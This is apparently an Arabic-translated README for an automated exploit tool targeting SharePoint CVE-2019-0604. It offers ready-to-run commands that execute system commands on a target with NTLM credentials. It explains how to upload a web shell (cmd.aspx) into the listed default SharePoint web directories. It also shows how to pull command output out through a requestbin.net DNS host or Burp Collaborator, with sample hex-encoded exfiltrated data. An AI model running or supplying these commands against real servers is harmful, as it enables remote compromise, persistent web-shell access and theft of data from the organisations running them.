
أداة آلية لاستغلال SharePoint CVE-2019-0604
أداة استغلال آلية لتعظيم استغلال CVE-2019-0604.
ملف requirements.txt يجب أن يسرد جميع مكتبات بايثون التي تستخدمها هذه الأداة، وسيتم تثبيتها باستخدام
$ pip install -r requirements.txt
$ python exploit.py -u <url-to-picker.aspx> -c whoami --ntlm -U <uname>:<passwd>
تحميل أي شيء رائع (شل ويب، أداة استطلاع ...)
Upload cmd.aspx to rcmd.aspx
--file-from /path/to/cmd.aspx --file-to /path/to/web_dir/rcmd.aspx
Sharepoint Default Web Virtual Dir:
C:\inetpub\wwwroot\wss\VirtualDirectories\80\_app_bin\ -> <target>/_app_bin/
C:\inetpub\wwwroot\wss\VirtualDirectories\80\_vti_pvt\ -> <target>/_vti_pvt/
C:\Program Files\Common Files\Microsoft shared\Web Server Extensions\15\template\layouts\ -> <target>/_layouts/15/
C:\Program Files\Common Files\Microsoft shared\Web Server Extensions\15\template\controltemplates\ -> <target>/_controltemplates/
C:\Program Files\Common Files\Microsoft shared\Web Server Extensions\15\template\identitymodel\login\ -> <target>/_login/
C:\Program Files\Common Files\Microsoft shared\Web Server Extensions\15\template\identitymodel\windows\ -> <target>/_windows/
C:\Program Files\Common Files\Microsoft shared\Web Server Extensions\wpresources\ -> <target>/_wpresources/
C:\Program Files\Common Files\Microsoft shared\Web Server Extensions\15\isapi\ -> <target>/_vti_bin/
تثبيت collaborator_http_api.py في BurpSuite (Pro)؟
تأكد من أن BurpSuite يعمل على نفس الجهاز مع هذه الأداة الاستغلالية.
قم بالتشغيل، واستمتع بالمخرجات المسترجعة :)
$ python exploit.py -u <url-to-picker.aspx> -c whoami --collab --ntlm -U <uname>:<passwd>

$ python exploit.py -u <url-to-picker.aspx> -r <path/to/reqFile> --oob 8486990041a11aaa43ce.d.requestbin.net -c "whoami /priv"
الحصول على البيانات من DNS
2050524956494c4547455320494e464f524d4154494f4e
...
قم بفك التشفير بنفسك :)
PRIVILEGES INFORMATION
...